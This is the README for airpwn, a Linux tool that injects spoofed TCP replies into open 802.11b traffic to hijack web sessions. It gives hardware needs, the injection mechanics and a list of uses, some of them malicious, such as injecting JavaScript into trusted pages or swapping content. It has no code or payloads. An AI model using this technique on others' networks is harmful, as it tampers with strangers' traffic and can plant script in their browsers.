Hi! Welcome to airpwn!

Some things you should probably know about airpwn, in some random order:

* This will only work on linux w/ the hostap drivers to my knowledge..
  This is due to the hostap drivers being the only ones I know of that
  will allow you to inject raw 802.11 frames, and then only in "master"
  mode with hostapd set to "1".  You can get hostap from
  http://hostap.epitest.fi

* You can check hostap's site for a list of supported cards, but I
  believe it's limited to prism2 chipsets.  I have succesfully run
  airpwn on "SMC EliteConnect" cards (SMC2532W-B), NetGear MA401s and
  a D-Link DWL650.  The "EliteConnects" are highly recommended as they
  push out 200mW (range!) and have 2 connectors for extenral antennas
  (more range!)

* aiwpwn requires two cards to operate.. One card in monitor mode (to
  listen to the packets) and one care in master mode (to inject
  packets).  AFAICT, cards in monitor mode cannot send frames, and in
  master mode you don't see traffic destined for other APs.

* Silly limitations to the technology that will hopefully be solved
  soon:

  1. airpwn only supports TCP now
  2. airpwn does not yet support 802.11g cards, as hostap doesn't either
  3. no WEP support yet
  4. for port-based DoS (think wireless firewall) it would be nice to
     respond to a SYN with a RST..
  5. only server-to-client responses are supported now
  6. only one packet can be injected at a time, so your response data
     needs to fit inside the interface MTU

Prerequisites:

  You'll need to have the following installed (and might need to edit
  the Makefile to specify proper paths (why? because I am too lazy to
  write a configure script :( ))

  * libpcap
  * libnet
  * libpcre
  * hostap drivers

How airpwn works:

  Airpwn will monitor traffic on an 802.11b network and respond with
  arbitrary content as configured.  The configuration file specifies a
  match regex, an ignore regex and a file containing the contents to
  inject.  If 'match' is detected and 'ignore' is not, a packet
  appearing to come from the remote IP address with the proper sequence
  numbers, and having the MAC address of the AP the client is associated
  with is injected into the air.  As long as airpwn responds before the
  remote site, the client will accept the airpwn packet as valid and
  will push the data to the application.  (Average internet latency is
  on the order of ~ 50msec. Airpwn should be able to respond in under
  1msec..) 

  (TCP details): Since the packet airpwn generates is the next segment
  in the stream and lines up with the expected numbers perfectly, the
  stack will push the data to the application immediately.. The "real"
  packet sent from the intended server will be handled in one of two
  ways, depending on the relative lengths of the packets:

    * If the "real" packet is longer than the injected one, the
      additional data in the real packet will be appended to the end of
      the stream, directly after the injected data.  (If you spoof a
      short response to an HTTP request, the rest of the web page will
      flow after your request (unless the server sends gzipped data, in
      which case you will see garbage.))

    * If the "real" packet is shorter than the injected one, the client
      will be confused by the packet and a) ignore it or b) send an ACK
      to the server letting the server know what sequence number it
      expects to see.  NOTE: in some cases this will cause an endless
      loop of client/server arguments over who has the right sequence
      number.  I have observed over 2000pps being generated by a single
      client/server pair due to this effect.

  airpwn has been succesfully tested against windows, linux and OSX.
  All of them are vulnerable.  In our experience windows is more
  vulnerable than OSX which is again more vulnerable than linux.  IE on
  windows is highly reliable as it will apparently take any data you
  throw at it and put it on the screen as fast as possible.

What can you do with airpwn:

  Well, a lot of things really.  With airpwn, you *are* the network..
  You are every web server out there.  Here are some good (and bad)
  ideas:

  * Be silly and respond to web requests with nasty things like goatse
  * Inject javascript into various webpages and see what fun stuff you
    can do.. Trusted websites have powerful script-fu..
  * Replace all banner-ad requests with ads you feel are more
    appropriate.
  * Write a wireless IDS and respond to dangerous packets with RSTs
  * Overwrite bad MP3s with your own music.. 
  * Automatic chat bot for AIM, IRC, etc.. 
  * Lots of worse/better things..
  * Have fun and teach people about wireless security!  Give people a
    good incentive to, and a solid understanding of why they should use
    VPNs, encrypted proxies, etc..
